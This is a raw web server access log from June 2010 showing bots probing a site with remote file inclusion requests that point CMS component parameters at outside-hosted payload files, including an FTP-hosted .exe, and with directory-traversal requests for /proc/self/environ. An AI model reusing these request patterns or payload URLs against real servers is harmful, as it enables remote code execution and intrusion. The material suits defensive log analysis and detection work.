67.18.167.170 - - [16/Jun/2010:22:45:32 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.18.167.170 - - [16/Jun/2010:22:45:32 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.18.167.170 - - [16/Jun/2010:22:45:22 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
72.55.146.200 - - [16/Jun/2010:22:53:53 -0700] "GET /logs//includes/errors.php?error=http://iit.metodist.ru/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
72.55.146.200 - - [16/Jun/2010:22:53:53 -0700] "GET /includes/errors.php?error=http://iit.metodist.ru/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
72.55.146.200 - - [16/Jun/2010:22:56:26 -0700] "GET /logs/access_091126.log//includes/errors.php?error=http://iit.metodist.ru/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
72.55.146.200 - - [16/Jun/2010:22:56:30 -0700] "GET /logs/access.log//includes/errors.php?error=http://iit.metodist.ru/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
195.190.166.35 - - [16/Jun/2010:22:58:47 -0700] "GET /includes/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
195.190.166.35 - - [16/Jun/2010:22:58:47 -0700] "GET /logs//includes/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
195.225.170.108 - - [16/Jun/2010:22:59:38 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
195.225.170.108 - - [16/Jun/2010:22:59:38 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
195.225.170.108 - - [16/Jun/2010:22:59:38 -0700] "GET /logs/access_091119.log%20%20//components/com_flyspray/startdown.php?file=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
195.225.170.108 - - [16/Jun/2010:22:59:48 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
72.55.146.200 - - [16/Jun/2010:23:00:25 -0700] "GET /logs/access_100325.log//includes/errors.php?error=http://iit.metodist.ru/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
195.190.166.35 - - [16/Jun/2010:23:01:44 -0700] "GET /logs/access_100107.log//includes/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
195.225.170.108 - - [16/Jun/2010:23:01:47 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
195.225.170.108 - - [16/Jun/2010:23:01:56 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
195.225.170.108 - - [16/Jun/2010:23:01:47 -0700] "GET /logs/access_091119.log%20%20//components/com_flyspray/startdown.php?file=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
195.225.170.108 - - [16/Jun/2010:23:01:47 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
111.118.160.130 - - [16/Jun/2010:23:01:47 -0700] "GET /logs/access_091126.log/file_upload.php?sbp=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.elfagr.net"
111.118.160.130 - - [16/Jun/2010:23:01:47 -0700] "GET /file_upload.php?sbp=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.elfagr.net"
111.118.160.130 - - [16/Jun/2010:23:01:48 -0700] "GET /logs/file_upload.php?sbp=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.elfagr.net"
195.190.166.35 - - [16/Jun/2010:23:01:52 -0700] "GET /logs/access_091126.log//includes/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
74.86.227.26 - - [16/Jun/2010:23:05:42 -0700] "GET /gnuboard4/bbs//delete_all.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.86.227.26 - - [16/Jun/2010:23:05:32 -0700] "GET /logs//gnuboard4/bbs//delete_all.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.86.227.26 - - [16/Jun/2010:23:05:32 -0700] "GET /logs/access.log//gnuboard4/bbs//delete_all.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
64.118.87.45 - - [16/Jun/2010:23:07:16 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hpbelizeadventures.com/hms/tmp/test.txt??? HTTP/1.1" 200 1466 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.elfagr.net"
64.118.87.45 - - [16/Jun/2010:23:07:17 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.hpbelizeadventures.com/hms/tmp/test.txt??? HTTP/1.1" 200 5950 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.elfagr.net"
74.53.64.210 - - [16/Jun/2010:23:07:26 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.hpbelizeadventures.com/hms/tmp/test.txt??? HTTP/1.1" 200 5950 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.elfagr.net"
74.53.64.210 - - [16/Jun/2010:23:07:26 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hpbelizeadventures.com/hms/tmp/test.txt??? HTTP/1.1" 200 1466 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.elfagr.net"
216.14.121.161 - - [16/Jun/2010:23:12:46 -0700] "GET /index.php?option=com_agora&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
109.71.41.45 - - [16/Jun/2010:23:14:32 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://valdez.at.ua/botscan/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
109.71.41.45 - - [16/Jun/2010:23:14:32 -0700] "GET /logs/access.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://valdez.at.ua/botscan/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
109.71.41.45 - - [16/Jun/2010:23:14:32 -0700] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://valdez.at.ua/botscan/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
109.71.41.45 - - [16/Jun/2010:23:14:33 -0700] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://valdez.at.ua/botscan/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
109.71.41.45 - - [16/Jun/2010:23:14:33 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://valdez.at.ua/botscan/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
109.71.41.45 - - [16/Jun/2010:23:14:43 -0700] "GET /logs/access.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://valdez.at.ua/botscan/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
219.94.128.174 - - [16/Jun/2010:23:21:08 -0700] "GET /snippetmaster//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.froehlich.us/squid/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
219.94.128.174 - - [16/Jun/2010:23:21:08 -0700] "GET /logs/access.log%20%20//snippetmaster//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.froehlich.us/squid/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
219.94.128.174 - - [16/Jun/2010:23:20:58 -0700] "GET /logs//snippetmaster//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.froehlich.us/squid/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
64.8.98.179 - - [16/Jun/2010:23:21:16 -0700] "GET /snippetmaster//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.froehlich.us/squid/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
64.8.98.179 - - [16/Jun/2010:23:21:07 -0700] "GET /logs//snippetmaster//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.froehlich.us/squid/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
64.8.98.179 - - [16/Jun/2010:23:21:17 -0700] "GET /logs/access.log%20%20//snippetmaster//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.froehlich.us/squid/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
64.8.98.179 - - [16/Jun/2010:23:23:47 -0700] "GET /logs/access.log//snippetmaster//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.froehlich.us/squid/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
219.94.128.174 - - [16/Jun/2010:23:26:38 -0700] "GET /logs/access.log//snippetmaster//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.froehlich.us/squid/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.129.74.98 - - [16/Jun/2010:23:29:02 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "elfagr.net"
216.14.121.161 - - [16/Jun/2010:23:29:08 -0700] "GET /logs/access.log//index.php?option=com_agora&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
216.14.121.161 - - [16/Jun/2010:23:29:18 -0700] "GET /index.php?option=com_agora&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
216.14.121.161 - - [16/Jun/2010:23:29:08 -0700] "GET /logs//index.php?option=com_agora&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "elfagr.net"
174.129.74.98 - - [16/Jun/2010:23:32:32 -0700] "GET / HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "elfagr.net"
211.234.100.196 - - [16/Jun/2010:23:36:00 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.234.100.196 - - [16/Jun/2010:23:39:49 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.234.100.196 - - [16/Jun/2010:23:41:18 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:23:43:03 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
211.234.100.196 - - [16/Jun/2010:23:43:48 -0700] "GET /logs/access.log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
211.234.100.196 - - [16/Jun/2010:23:43:58 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
211.234.100.196 - - [16/Jun/2010:23:43:50 -0700] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
94.23.31.164 - - [16/Jun/2010:23:44:19 -0700] "GET /logs/access.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
94.23.31.164 - - [16/Jun/2010:23:44:19 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
94.23.31.164 - - [16/Jun/2010:23:44:29 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
95.50.85.99 - - [16/Jun/2010:23:45:32 -0700] "GET /components/com_sef/sef_func.php?mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
95.50.85.99 - - [16/Jun/2010:23:45:22 -0700] "GET /logs//components/com_sef/sef_func.php?mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
95.50.85.99 - - [16/Jun/2010:23:45:22 -0700] "GET /logs/access.log%20%20//components/com_sef/sef_func.php?mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
200.175.239.226 - - [16/Jun/2010:23:46:34 -0700] "GET /components/com_sef/sef_func.php?mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
200.175.239.226 - - [16/Jun/2010:23:46:36 -0700] "GET /logs//components/com_sef/sef_func.php?mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
200.175.239.226 - - [16/Jun/2010:23:46:26 -0700] "GET /logs/access.log%20%20//components/com_sef/sef_func.php?mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
211.234.100.196 - - [16/Jun/2010:23:48:57 -0700] "GET /logs/access.log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.234.100.196 - - [16/Jun/2010:23:48:58 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.234.100.196 - - [16/Jun/2010:23:48:58 -0700] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
95.50.85.99 - - [16/Jun/2010:23:51:04 -0700] "GET /logs/access.log//components/com_sef/sef_func.php?mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "elfagr.net"
211.234.100.196 - - [16/Jun/2010:23:53:50 -0700] "GET /logs/access.log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.234.100.196 - - [16/Jun/2010:23:53:41 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.234.100.196 - - [16/Jun/2010:23:53:41 -0700] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.234.100.196 - - [16/Jun/2010:23:58:49 -0700] "GET /logs/access.log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.234.100.196 - - [16/Jun/2010:23:58:50 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.234.100.196 - - [16/Jun/2010:23:58:50 -0700] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
200.175.239.226 - - [17/Jun/2010:00:01:01 -0700] "GET /logs/access.log//components/com_sef/sef_func.php?mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
211.43.212.56 - - [17/Jun/2010:00:03:23 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "elfagr.net"
211.43.212.56 - - [17/Jun/2010:00:03:41 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "elfagr.net"
211.43.212.56 - - [17/Jun/2010:00:03:59 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "elfagr.net"
67.195.111.171 - - [17/Jun/2010:00:04:22 -0700] "GET /logs/ HTTP/1.0" 200 5927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
62.182.63.49 - - [17/Jun/2010:00:04:31 -0700] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hpbelizeadventures.com/hms/tmp/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "www.elfagr.net"
62.182.63.49 - - [17/Jun/2010:00:04:31 -0700] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hpbelizeadventures.com/hms/tmp/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "www.elfagr.net"
64.118.87.45 - - [17/Jun/2010:00:05:28 -0700] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hpbelizeadventures.com/hms/tmp/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.elfagr.net"
64.118.87.45 - - [17/Jun/2010:00:05:28 -0700] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hpbelizeadventures.com/hms/tmp/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.elfagr.net"
195.190.166.35 - - [17/Jun/2010:00:08:23 -0700] "GET /logs/access.log//includes/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
195.190.166.35 - - [17/Jun/2010:00:08:23 -0700] "GET /includes/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
195.190.166.35 - - [17/Jun/2010:00:08:33 -0700] "GET /logs//includes/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
211.43.212.56 - - [17/Jun/2010:00:14:24 -0700] "GET /logs/access.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "elfagr.net"
211.43.212.56 - - [17/Jun/2010:00:14:24 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "elfagr.net"
211.43.212.56 - - [17/Jun/2010:00:14:25 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "elfagr.net"
211.43.212.56 - - [17/Jun/2010:00:14:29 -0700] "GET /logs/access.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "elfagr.net"
211.43.212.56 - - [17/Jun/2010:00:14:40 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "elfagr.net"
211.43.212.56 - - [17/Jun/2010:00:14:31 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "elfagr.net"
211.43.212.56 - - [17/Jun/2010:00:15:50 -0700] "GET /logs/access.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "elfagr.net"
211.43.212.56 - - [17/Jun/2010:00:15:41 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "elfagr.net"
211.43.212.56 - - [17/Jun/2010:00:15:42 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "elfagr.net"
109.71.41.45 - - [17/Jun/2010:00:20:03 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://valdez.at.ua/botscan/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
109.71.41.45 - - [17/Jun/2010:00:19:53 -0700] "GET /logs/access_091126.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://valdez.at.ua/botscan/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
109.71.41.45 - - [17/Jun/2010:00:19:53 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://valdez.at.ua/botscan/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
109.71.41.45 - - [17/Jun/2010:00:21:09 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://valdez.at.ua/botscan/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
109.71.41.45 - - [17/Jun/2010:00:21:19 -0700] "GET /logs/access_091126.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://valdez.at.ua/botscan/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
109.71.41.45 - - [17/Jun/2010:00:21:19 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://valdez.at.ua/botscan/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
216.193.128.54 - - [17/Jun/2010:00:47:07 -0700] "GET /logs/access_100520.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://66.210.47.200/v6id.exe????%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.elfagr.net"
216.193.128.54 - - [17/Jun/2010:00:46:57 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://66.210.47.200/v6id.exe????%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.elfagr.net"
216.193.128.54 - - [17/Jun/2010:00:46:57 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://66.210.47.200/v6id.exe????%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.elfagr.net"
193.231.187.33 - - [17/Jun/2010:00:55:03 -0700] "GET /includes/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
193.231.187.33 - - [17/Jun/2010:00:55:03 -0700] "GET /logs//includes/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
193.231.187.33 - - [17/Jun/2010:00:57:20 -0700] "GET /logs/access.log//includes/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
193.231.187.33 - - [17/Jun/2010:00:57:30 -0700] "GET /includes/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
193.231.187.33 - - [17/Jun/2010:00:57:20 -0700] "GET /logs//includes/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
193.231.187.33 - - [17/Jun/2010:01:00:36 -0700] "GET /logs/access_091126.log//includes/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
72.55.146.200 - - [17/Jun/2010:01:05:00 -0700] "GET /logs/access.log//includes/errors.php?error=http://iit.metodist.ru/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
72.55.146.200 - - [17/Jun/2010:01:05:00 -0700] "GET /logs//includes/errors.php?error=http://iit.metodist.ru/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
72.55.146.200 - - [17/Jun/2010:01:05:10 -0700] "GET /includes/errors.php?error=http://iit.metodist.ru/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
207.46.199.185 - - [17/Jun/2010:01:24:09 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "elfagr.net"
174.121.64.34 - - [17/Jun/2010:01:43:36 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
79.174.68.88 - - [17/Jun/2010:01:46:54 -0700] "GET /logs/access_100121.log///index.php?option=com_contact&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
79.174.68.88 - - [17/Jun/2010:01:46:54 -0700] "GET /logs///index.php?option=com_contact&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
79.174.68.88 - - [17/Jun/2010:01:47:04 -0700] "GET //index.php?option=com_contact&mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
174.121.64.34 - - [17/Jun/2010:01:48:42 -0700] "GET /logs/access.log//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
